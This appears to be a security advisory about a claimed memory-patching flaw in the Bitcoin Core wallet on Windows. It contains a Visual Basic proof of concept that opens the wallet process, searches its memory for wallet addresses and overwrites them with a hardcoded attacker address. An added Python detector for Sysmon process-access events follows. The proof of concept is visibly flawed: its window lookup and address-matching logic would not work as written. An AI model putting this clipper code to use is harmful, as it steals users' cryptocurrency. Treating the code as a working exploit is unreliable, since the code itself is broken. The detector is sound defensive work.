CVE-2023-37192: The Bitcoin app is vulnerable to hackers!

Memory management and protection issues in Bitcoin Core v22 allow attackers to modify the stored sending address within the app's memory, potentially allowing them to redirect Bitcoin transactions to wallets of their own choosing.


Description

Bitcoin Core (latest version, 22.0) suffers from a memory management issue that enables attackers to redirect funds to their own Bitcoin address.

DATE(S) ISSUED: 06/22/2023

RISK: Critical

Businesses (large and medium Bitcoin miners): HIGH

Home users: LOW

Method: Remote thread execution

OVERVIEW:

The Bitcoin app on Windows currently has issues with memory management and memory protection. These weaknesses allow attackers to modify the stored sending address within the app's memory, ultimately redirecting Bitcoin transactions to their own wallets.

Attacker's Method:

The Bitcoin app suffers from memory management issues that allow an attacker to open the bitcoin process and search its memory for Bitcoin wallet addresses. While Bitcoin uses the SHA-256 hashing algorithm for the data stored in the blocks on the blockchain, the BTC addresses themselves are held unencrypted in the process's memory.

A transaction on the Bitcoin blockchain is made out to public addresses, and these public addresses are held in the Bitcoin app's memory before the transaction is initiated.

An attacker can simply search for these BTC addresses, a string of 26-35 letters and numbers, which lets them locate every Bitcoin wallet address stored in the Bitcoin app and replace it with their own.

When an attacker replaces the public address, the Bitcoin transaction is simply redirected to their own wallet. Due to the inherent nature of Bitcoin, this transfer is irreversible.

This method closely resembles the widely known point-of-sale malware Tinypos.

My research about Tinypos can be found here:

https://securitynews.sonicwall.com/xmlpost/tinypos-a-new-multi-component-pos-family-actively-spreading-in-the-wild/

To my understanding, we can expect to see an increase in the prevalence of Bitcoin point-of-sale (POS) malware in the near future!

The major difference between Tinypos and Bitcoin malware is that Bitcoin operates in a decentralized manner with no central authority; if you become the victim of such an attack, your funds are permanently lost!

Video of Attack:

https://www.youtube.com/watch?v=oEl4M1oZim0

In this video, I used an app called Cheat Engine to demonstrate how hacking a Bitcoin wallet works. As you can see in the video, I created a Bitcoin sending address under my name. An attacker can easily gain access to the Bitcoin memory app and replace it with another BTC wallet, causing all funds to be transferred to their own wallet during any transaction!

POC:

```vb
' Attacker-controlled address that overwrites any matched wallet address (32-bit VB6/VBA module)
Private Const replace_hash As String = "bc1pkwjlvljdq6huzk85d8z695v26e93dd1m0upqumkncmx640dpdu4suyukmt" ' attacker's hash

' Layout returned by VirtualQueryEx (32-bit)
Private Type MEMORY_BASIC_INFORMATION
    BaseAddress As Long
    AllocationBase As Long
    AllocationProtect As Long
    RegionSize As Long
    State As Long
    Protect As Long
    Type As Long
End Type

' Win32 API declarations
' FindWindow is called below but was not declared in the original listing; declaration added
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hWnd As Long, lpdwProcessId As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function VirtualQueryEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, lpBuffer As MEMORY_BASIC_INFORMATION, ByVal dwLength As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Const WM_GETTEXT As Long = &HD
Private Const WM_SETTEXT As Long = &HC
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_PRIVATE As Long = &H20000
Private Const PAGE_READWRITE As Long = &H4

Private Sub Bitcoin_hack()
    Dim hWnd As Long
    Dim processId As Long
    Dim hProcess As Long
    Dim buffer As String
    Dim processName As String
    Dim searchString As String
    Dim replacementString As String

    processName = "bitcoin-qt.exe"
    searchString = "^[A-Za-z]{26,35}$" ' Pattern for strings of 26-35 letters (Bitcoin address)
    replacementString = replace_hash

    hWnd = FindWindow(vbNullString, processName)
    If hWnd <> 0 Then
        ' Get the process ID
        GetWindowThreadProcessId hWnd, processId

        ' Open the process
        hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, processId)
        If hProcess <> 0 Then
            Dim lpMemInfo As MEMORY_BASIC_INFORMATION
            Dim lpBuffer As String
            Dim lpAddress As Long
            Dim bytesRead As Long

            lpAddress = 0 ' Start at the beginning of the process memory

            ' Walk every region of the target's address space
            Do While VirtualQueryEx(hProcess, lpAddress, lpMemInfo, Len(lpMemInfo)) <> 0
                ' Only committed, private, read/write pages (heap-like data)
                If (lpMemInfo.State = MEM_COMMIT) And (lpMemInfo.Type = MEM_PRIVATE) And (lpMemInfo.Protect = PAGE_READWRITE) Then
                    ' Allocate a buffer to read the memory
                    lpBuffer = Space(lpMemInfo.RegionSize)

                    ' Read the memory
                    ReadProcessMemory hProcess, ByVal lpMemInfo.BaseAddress, ByVal lpBuffer, lpMemInfo.RegionSize, bytesRead

                    ' Check if the buffer contains a matching string
                    If Len(lpBuffer) >= 26 And Len(lpBuffer) <= 35 And RegExpMatch(lpBuffer, searchString) Then
                        Dim writeBuffer As String
                        writeBuffer = RegExpReplace(lpBuffer, searchString, replacementString)

                        ' Write the modified text
                        WriteProcessMemory hProcess, ByVal lpMemInfo.BaseAddress, ByVal StrPtr(writeBuffer), Len(writeBuffer), 0
                    End If
                End If

                ' Move to the next memory region
                lpAddress = lpMemInfo.BaseAddress + lpMemInfo.RegionSize
            Loop

            ' Close the process handle
            CloseHandle hProcess
        Else
            MsgBox "Failed to open the process.", vbCritical
        End If
    Else
        MsgBox "The process could not be found.", vbCritical
    End If
End Sub

' Test whether text matches pattern using the VBScript regular-expression engine
Private Function RegExpMatch(ByVal text As String, ByVal pattern As String) As Boolean
    Dim regExp As Object
    Set regExp = CreateObject("VBScript.RegExp")
    With regExp
        .Global = True
        .IgnoreCase = True
        .Pattern = pattern
    End With
    RegExpMatch = regExp.Test(text)
End Function

' Replace every match of pattern in text with replacement
Private Function RegExpReplace(ByVal text As String, ByVal pattern As String, ByVal replacement As String) As String
    Dim regExp As Object
    Set regExp = CreateObject("VBScript.RegExp")
    With regExp
        .Global = True
        .IgnoreCase = True
        .Pattern = pattern
    End With
    RegExpReplace = regExp.Replace(text, replacement)
End Function
```
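The memory write that both the attacker's method described above and the POC rely on leaves a clear trace in host telemetry: another process has to open the wallet process with write rights, and Sysmon Event ID 10 (ProcessAccess) records every such cross-process handle together with its GrantedAccess mask. The detector below is an added example written for this page; it is not code from the advisory's author or from Bitcoin Core. The "key: value|key: value" record layout, the allowlist of source images and the log lines themselves are constructed for the demonstration, and the PROCESS_* constants are the documented Win32 values.

```python
"""Flag processes that obtain write access to a wallet process.

Added example for this advisory (not from the original write-up or Bitcoin
Core). Parses Sysmon Event ID 10 (ProcessAccess) records and alerts when a
non-allowlisted SourceImage holds PROCESS_VM_WRITE or PROCESS_VM_OPERATION on
a wallet binary. Record layout and all sample records are constructed.
"""
from dataclasses import dataclass, field

# Win32 process access rights relevant to memory patching (documented values).
PROCESS_VM_OPERATION = 0x0008   # change page protection / VirtualProtectEx
PROCESS_VM_READ = 0x0010        # ReadProcessMemory
PROCESS_VM_WRITE = 0x0020       # WriteProcessMemory
PROCESS_ALL_ACCESS = 0x1F0FFF   # the mask requested by the POC on this page

RIGHT_NAMES = {
    PROCESS_VM_OPERATION: "PROCESS_VM_OPERATION",
    PROCESS_VM_READ: "PROCESS_VM_READ",
    PROCESS_VM_WRITE: "PROCESS_VM_WRITE",
}

# Wallet binaries whose memory should never be written by another user-mode process.
WALLET_IMAGES = {"bitcoin-qt.exe", "bitcoind.exe"}

# Sources that legitimately hold broad handles on every process
# (assumed allowlist; tune it to the EDR/AV actually deployed on the fleet).
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\lsass.exe",
}

# Either right lets the caller alter the target's memory.
WRITE_RIGHTS = PROCESS_VM_WRITE | PROCESS_VM_OPERATION


@dataclass
class Finding:
    source: str
    target: str
    granted: int
    rights: list = field(default_factory=list)


def decode_rights(mask: int) -> list:
    """Name the memory-related rights present in a GrantedAccess mask."""
    return [name for bit, name in RIGHT_NAMES.items() if mask & bit]


def parse_event(line: str) -> dict:
    """Split one 'key: value|key: value' record into a dict.

    Only the first ':' of each part separates key from value, so Windows
    paths such as C:\\Program Files\\... survive intact.
    """
    fields = {}
    for part in line.split("|"):
        key, sep, value = part.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def is_suspicious(fields: dict) -> bool:
    """True when a non-allowlisted process gets write rights on a wallet process."""
    if fields.get("EventID") != "10":
        return False
    target = fields.get("TargetImage", "").rsplit("\\", 1)[-1].lower()
    if target not in WALLET_IMAGES:
        return False
    if fields.get("SourceImage", "").lower() in ALLOWED_SOURCES:
        return False
    granted = int(fields.get("GrantedAccess", "0"), 16)
    return bool(granted & WRITE_RIGHTS)


def scan(lines) -> list:
    """Return one Finding per suspicious ProcessAccess record."""
    findings = []
    for line in lines:
        fields = parse_event(line)
        if is_suspicious(fields):
            granted = int(fields["GrantedAccess"], 16)
            findings.append(Finding(fields["SourceImage"], fields["TargetImage"],
                                    granted, decode_rights(granted)))
    return findings


# Constructed sample records (not real telemetry).
SAMPLE_LOG = [
    r"EventID: 10|SourceImage: C:\Users\alice\Desktop\memtool.exe|TargetImage: C:\Program Files\Bitcoin\bitcoin-qt.exe|GrantedAccess: 0x1F0FFF",
    r"EventID: 10|SourceImage: C:\Windows\System32\csrss.exe|TargetImage: C:\Program Files\Bitcoin\bitcoin-qt.exe|GrantedAccess: 0x1FFFFF",
    r"EventID: 10|SourceImage: C:\Program Files\SomeAV\scanner.exe|TargetImage: C:\Program Files\Bitcoin\bitcoin-qt.exe|GrantedAccess: 0x1010",
    r"EventID: 10|SourceImage: C:\Users\alice\AppData\Local\Temp\upd.exe|TargetImage: C:\Windows\notepad.exe|GrantedAccess: 0x1F0FFF",
    r"EventID: 10|SourceImage: C:\Users\alice\AppData\Local\Temp\upd.exe|TargetImage: C:\Program Files\Bitcoin\bitcoin-qt.exe|GrantedAccess: 0x0038",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"ALERT {f.source} -> {f.target} granted=0x{f.granted:X} {f.rights}")
```

Of the five constructed records only the first and the last trigger: the csrss.exe handle is allowlisted, the scanner holds read-only rights (0x1010), and the fourth targets notepad rather than a wallet. Matching on the write bits rather than on the exact 0x1F0FFF value matters because a tool that requests only PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_VM_READ (0x0038) can patch memory just as well as one that asks for everything.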

Summary:

Use Cold Wallets until they fix this!

Questions?

[email protected]
